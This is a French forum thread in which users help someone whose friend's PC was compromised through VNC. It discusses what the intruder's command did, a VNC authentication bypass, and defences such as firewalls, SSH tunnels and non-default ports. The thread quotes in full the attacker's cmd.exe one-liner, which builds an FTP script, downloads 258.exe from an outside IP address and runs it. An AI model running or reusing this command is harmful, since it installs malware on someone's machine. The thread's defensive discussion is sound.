Attaque par VNC

[engi]

bonjour,

j'ai assisté hier sur la machine d'un copain à une "attaque" via VNC.
pour faire de la télémaintenance sur sa machine, je lui ai installé il y un moment un serveur vnc.
depuis quelques temps, il me disait que son antivirus détecte souvent un cheval de troie et que le phénomène se reproduit régulièrement.
d'autre part, il me disait aussi qu'une fenêtre DOS apparaissait furtivement et que clavier et souris étaient bloqués.
hier, j'étais chez lui et j'ai assisté au problème.
j'ai tout de suite vu qu'une session distante VNC était ouverte et j'ai donc débranché le cable réseau.
parmis tout ce que faisait "l'opérateur" distant, voilà une commande qu'il lancait :

Code: Tout sélectionner

cmd.exe /c del i&echo open 86.201.215.239 2042 > i&echo user 1 1 >> i &echo get 258.exe >> i &echo quit >> i &ftp -n -s:i &258.exe&del i&exit


J'ai l'impression qu'il téléchargeait quelque chose mais je comprends pas tout.

Juste par curiosité, ça fait quoi cette commande ?

[Gaston]

Code: Tout sélectionner

cmd.exe /c del i&echo open 86.201.215.239 2042 > i&echo user 1 1 >> i &echo get 258.exe >> i &echo quit >> i &ftp -n -s:i &258.exe&del i&exit


Google t'aurais répondu aussi bien que moi : il ouvre une connexion quelque part sur le port 2042, ouvre un ftp et récupère un fichier 258.exe et l'exécute

un nettoyage de fonds en comblre, l'installation d'outils appropriés me semble urgent ?)

G.

[engi]

outils appropriés ?
qu'est-ce que tu entends par là ?

pour ce qui est de l'antivirus, c'est fait.

pour ce qui d'un parefeu, vu que le port utilisé pour les sessions distantes vnc est ouvert et que c'est justement vnc qui est utilisé pour pénétrer sur le système , je ne vois pas bien comment faire.

je précise que le pc n'a pas d'adresse ip publique fixe et que les sessions distantes sont censément protégées par la saisie d'un mot de passe.
à ce titre, comment notre "pirate" distant arrive-t-il à se loguer ?

[S0l0]

hello ,

il me semble avoir vu un post semblable sur devellopez

pour ce qui d'un parefeu, vu que le port utilisé pour les sessions distantes vnc est ouvert et que c'est justement vnc qui est utilisé pour pénétrer sur le système , je ne vois pas bien comment faire.

au hazard essaie de mettre a jour VNC

je précise que le pc n'a pas d'adresse ip publique fixe

i believe i can fly .....

et que les sessions distantes sont censément protégées par la saisie d'un mot de passe.
à ce titre, comment notre "pirate" distant arrive-t-il à se loguer ?

VNC Authentication Bypass
et comment fait ' TON PIRATE ' pour se connecter ben il se connecte pas , c'est 258.exe qui se connecte ; c'est ce que l'on appel du remote connection.

En tout cas la reinstallation complete du systeme s'impose.

PS cette attaque est realisable par n'importe qui sachant cliquer

[fred-info]

Bonjour,

pour commencer un petit lien qui explique tout ça :

http://www.securiteam.com/unixfocus/5WP0D1FIKC.html


et à la fin

Workaround:
Run VNC servers behind firewall, and use SSH tunnels for communication.

Je rajouterai un conseil perso : Ne jamais utiliser les ports par défaut pour ce type d'appli

C'est beaucoup plus facile pour l'attaquant de voir un port ouvert et d'essayer son "exploit" si il sait lequel utiliser.


A+